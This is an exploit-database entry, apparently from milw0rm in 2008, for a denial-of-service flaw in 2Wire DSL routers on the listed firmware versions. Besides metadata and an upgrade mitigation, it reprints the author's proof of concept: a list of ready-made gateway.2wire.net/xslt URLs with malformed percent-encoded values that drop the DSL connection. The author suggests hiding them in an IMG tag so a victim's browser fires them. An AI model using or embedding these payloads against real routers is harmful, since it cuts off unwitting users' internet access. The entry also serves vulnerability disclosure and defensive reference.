2WIRE ROUTER DSL DENIAL OF SERVICE

vendor:

Router

by:

hkm

8.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Router

Affected Version From: v3.17.5, 3.7.1, 4.25.19, 5.29.51

Affected Version To: v3.17.5, 3.7.1, 4.25.19, 5.29.51

Patch Exists: YES

Related CWE: N/A

CPE: 2wire.net

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

2WIRE ROUTER DSL DENIAL OF SERVICE

The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.

Mitigation:

Upgrade to the latest version of the firmware

Source

Exploit-DB raw data:

2WIRE ROUTER DSL DENIAL OF SERVICE


VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51

The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. 

PoC: (this can be set in an IMG tag or whatever)

http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...


hkm


hkm {@} hakim.ws 

Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.

# milw0rm.com [2008-11-08]